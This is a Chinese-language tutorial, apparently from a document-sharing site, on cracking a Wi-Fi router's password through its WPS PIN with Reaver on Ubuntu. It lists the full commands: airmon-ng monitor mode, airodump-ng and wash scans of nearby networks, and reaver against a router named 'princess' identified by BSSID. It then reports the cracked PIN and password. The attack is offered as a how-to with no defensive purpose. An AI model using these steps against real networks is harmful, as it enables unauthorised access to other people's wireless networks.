ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

ubuntu-16.04(linux)使⽤Reaver爆破wifi密码(路由器的WPS
功能漏洞)
很多路由器都有WPS功能,这边的WPS不是office⼯具软件,⽽是路由器的⼀个功能:
路由器中WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定(Wi-Fi Protected Setup)标准,该标准推出的主要原因是为了解决长久以来⽆线⽹络加密认证设定的步骤过于繁杂艰难之弊病,使⽤者往往会因为步骤太过⿇烦,以致⼲脆不做任何加密安全设定,因⽽引发许多安全上的问题。

WPS⽤于简化Wi-Fi⽆线的安全设置和⽹络管理。

它⽀持两种模式:个⼈识别码(PIN)模式和按钮(PBC)模式。

只要获取路由器的PIN码,我们就可以不输⼊⽤户名和密码连上路由器,⽽这个PIN码通过穷举法是可以破解出来的, 我们所⽤Reaver这个软件破解PIN码
打开终端命令⾏,输⼊以下命令安装Reaver
apt-get update
更新完成之后,再输⼊
apt-get install reaver
安装过程,请等待....
打开终端,输⼊ ifconfig, 查看本地的⽹卡接⼝,因为我这边系统是双系统,⽬前的环境为ubuntu, Mac⾃带的⽹卡⽆法将⽹卡设置为监听模式:ifconfig
将⽆线⽹卡设置为监控模式:假设你的⽆线⽹卡接⼝名称为wlx001d0f04f093,执⾏下列命令,将⽆线⽹卡设置为监控模式 :
sudo airmon-ng start wlx001d0f04f093
再执⾏:sudo airodump-ng mon0,获取附近的WIFI信号:
sudo airodump-ng mon0
我们的⽬标为最后⼀个路由器,路由器的ESSID:princess, BSSID : 5C:63:BF:C4:A4:CE
我们使⽤wash这个命令,可以查看到附近有开WPS功能的路由器,在控制台输⼊⼀下代码, mon0为混杂模式的⽹卡端⼝,查看结果如下图:
sudo wash -i mon0
在终端中执⾏下列命令,⽤你实际获取到的BSSID替换命令中的bssid: reaver -i moninterface -b bssid -vv :
我这边测试机的命令为:
sudo reaver -i mon0 -b 5C:63:BF:C4:A4:CE -vv
过了⼏分钟以后,破解的密码就出现了, PIN码为00001304, 破解出来的密码为 abcde:
WPS功能:。

相关文档
最新文档